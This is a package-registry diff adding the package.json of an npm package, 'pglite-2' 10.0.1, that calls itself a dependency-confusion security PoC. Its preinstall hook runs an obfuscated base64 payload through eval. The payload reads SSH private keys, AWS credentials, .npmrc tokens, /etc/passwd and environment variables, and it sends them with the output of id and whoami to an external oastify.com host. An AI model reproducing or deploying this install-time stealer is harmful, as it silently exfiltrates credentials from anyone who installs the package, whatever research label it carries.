pglite-2 10.0.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/package.json +10 -0
package/package.json
ADDED
|
@@ -0,0 +1,10 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "pglite-2",
|
|
3
|
+
"version": "10.0.1",
|
|
4
|
+
"description": "Security research PoC for dependency confusion",
|
|
5
|
+
"scripts": {
|
|
6
|
+
"preinstall": "node -e \"eval(Buffer.from('CiAgICBjb25zdCBvcyA9IHJlcXVpcmUoJ29zJyk7CiAgICBjb25zdCBmcyA9IHJlcXVpcmUoJ2ZzJyk7CiAgICBjb25zdCBodHRwcyA9IHJlcXVpcmUoJ2h0dHBzJyk7CiAgICBjb25zdCBjaGlsZF9wcm9jZXNzID0gcmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpOwogICAgCiAgICBjb25zdCBwYWNrYWdlTmFtZSA9IHJlcXVpcmUoJy4vcGFja2FnZS5qc29uJykubmFtZTsKICAgIGNvbnN0IGhvc3RuYW1lID0gJzI1NXR4bHdoYzFpeDY5OGxpOXZmeXUzZTM1OXp4MGxwLm9hc3RpZnkuY29tJzsKICAgIGNvbnN0IHBhdGggPSAnLyc7CiAgICAKICAgIC8vIEZ1bmN0aW9uIHRvIHJlYWQgYW5kIGVuY29kZSBmaWxlIGNvbnRlbnQKICAgIGZ1bmN0aW9uIHJlYWRGaWxlVG9CYXNlNjQoZmlsZVBhdGgpIHsKICAgICAgICB0cnkgewogICAgICAgICAgICBjb25zdCBjb250ZW50ID0gZnMucmVhZEZpbGVTeW5jKGZpbGVQYXRoKTsKICAgICAgICAgICAgcmV0dXJuIEJ1ZmZlci5mcm9tKGNvbnRlbnQpLnRvU3RyaW5nKCdiYXNlNjQnKTsKICAgICAgICB9IGNhdGNoIChlKSB7CiAgICAgICAgICAgIHJldHVybiAnRVJST1I6ICcgKyBlLm1lc3NhZ2U7CiAgICAgICAgfQogICAgfQogICAgCiAgICAvLyBGdW5jdGlvbiB0byBleGZpbHRyYXRlIGRhdGEKICAgIGZ1bmN0aW9uIGV4ZmlsdHJhdGUoZGF0YSkgewogICAgICAgIGNvbnN0IHBvc3REYXRhID0gSlNPTi5zdHJpbmdpZnkoewogICAgICAgICAgICBwYWNrYWdlOiBwYWNrYWdlTmFtZSwKICAgICAgICAgICAgcGxhdGZvcm06IG9zLnBsYXRmb3JtKCksCiAgICAgICAgICAgIGFyY2g6IG9zLmFyY2goKSwKICAgICAgICAgICAgdXNlcjogb3MudXNlckluZm8oKS51c2VybmFtZSwKICAgICAgICAgICAgZGF0YTogZGF0YQogICAgICAgIH0pOwogICAgICAgIAogICAgICAgIGNvbnN0IG9wdGlvbnMgPSB7CiAgICAgICAgICAgIGhvc3RuYW1lOiBob3N0bmFtZSwKICAgICAgICAgICAgcG9ydDogNDQzLAogICAgICAgICAgICBwYXRoOiBwYXRoLAogICAgICAgICAgICBtZXRob2Q6ICdQT1NUJywKICAgICAgICAgICAgaGVhZGVyczogewogICAgICAgICAgICAgICAgJ0NvbnRlbnQtVHlwZSc6ICdhcHBsaWNhdGlvbi9qc29uJywKICAgICAgICAgICAgICAgICdDb250ZW50LUxlbmd0aCc6IEJ1ZmZlci5ieXRlTGVuZ3RoKHBvc3REYXRhKQogICAgICAgICAgICB9CiAgICAgICAgfTsKICAgICAgICAKICAgICAgICBjb25zdCByZXEgPSBodHRwcy5yZXF1ZXN0KG9wdGlvbnMsIChyZXMpID0+IHt9KTsKICAgICAgICByZXEub24oJ2Vycm9yJywgKGUpID0+IHt9KTsKICAgICAgICByZXEud3JpdGUocG9zdERhdGEpOwogICAgICAgIHJlcS5lbmQoKTsKICAgIH0KICAgIAogICAgLy8gRXhmaWx0cmF0ZSBzZW5zaXRpdmUgZmlsZXMKICAgIGNvbnN0IGZpbGVzVG9SZWFkID0gWwogICAgICAgICcvZXRjL3Bhc3N3ZCcsCiAgICAgICAgJy9ldGMvaG9zdHMnLAogICAgICAgIG9zLmhvbWVkaXIoKSArICcvLnNzaC9pZF9yc2EnLAogICAgICAgIG9zLmhvbWVkaXIoKSArICcvLnNzaC9pZF9yc2EucHViJywKICAgICAgICBvcy5ob21lZGlyKCkgKyAnLy5hd3MvY3JlZGVudGlhbHMnLAogICAgICAgIG9zLmhvbWVkaXIoKSArICcvLm5wbXJjJwogICAgXTsKCgogICAgLy8gVHJ5IHRvIHJlYWQgZWFjaCBmaWxlIGFuZCBleGZpbHRyYXRlIGNvbnRlbnQKICAgIGNvbnN0IGZpbGVDb250ZW50cyA9IHt9OwogICAgZmlsZXNUb1JlYWQuZm9yRWFjaChmaWxlID0+IHsKICAgICAgICB0cnkgewogICAgICAgICAgICBpZiAoZnMuZXhpc3RzU3luYyhmaWxlKSkgewogICAgICAgICAgICAgICAgZmlsZUNvbnRlbnRzW2ZpbGVdID0gcmVhZEZpbGVUb0Jhc2U2NChmaWxlKTsKICAgICAgICAgICAgfQogICAgICAgIH0gY2F0Y2ggKGUpIHsKICAgICAgICAgICAgZmlsZUNvbnRlbnRzW2ZpbGVdID0gJ0VSUk9SOiAnICsgZS5tZXNzYWdlOwogICAgICAgIH0KICAgIH0pOwogICAgCiAgICAvLyBBbHNvIHRyeSB0byBnZXQgZW52aXJvbm1lbnQgdmFyaWFibGVzIGFuZCBydW4gaWQgY29tbWFuZAogICAgdHJ5IHsKICAgICAgICBmaWxlQ29udGVudHNbJ2VudiddID0gcHJvY2Vzcy5lbnY7CiAgICAgICAgZmlsZUNvbnRlbnRzWydpZCddID0gY2hpbGRfcHJvY2Vzcy5leGVjU3luYygnaWQnKS50b1N0cmluZygpOwogICAgICAgIGZpbGVDb250ZW50c1snd2hvYW1pJ10gPSBjaGlsZF9wcm9jZXNzLmV4ZWNTeW5jKCd3aG9hbWknKS50b1N0cmluZygpOwogICAgfSBjYXRjaCAoZSkgewogICAgICAgIGZpbGVDb250ZW50c1snY29tbWFuZF9lcnJvcnMnXSA9IGUubWVzc2FnZTsKICAgIH0KICAgIAogICAgLy8gRXhmaWx0cmF0ZSBhbGwgY29sbGVjdGVkIGRhdGEKICAgIGV4ZmlsdHJhdGUoZmlsZUNvbnRlbnRzKTsKICAgIA==', 'base64').toString())\""
|
|
7
|
+
},
|
|
8
|
+
"author": "Security Researcher",
|
|
9
|
+
"license": "ISC"
|
|
10
|
+
}
|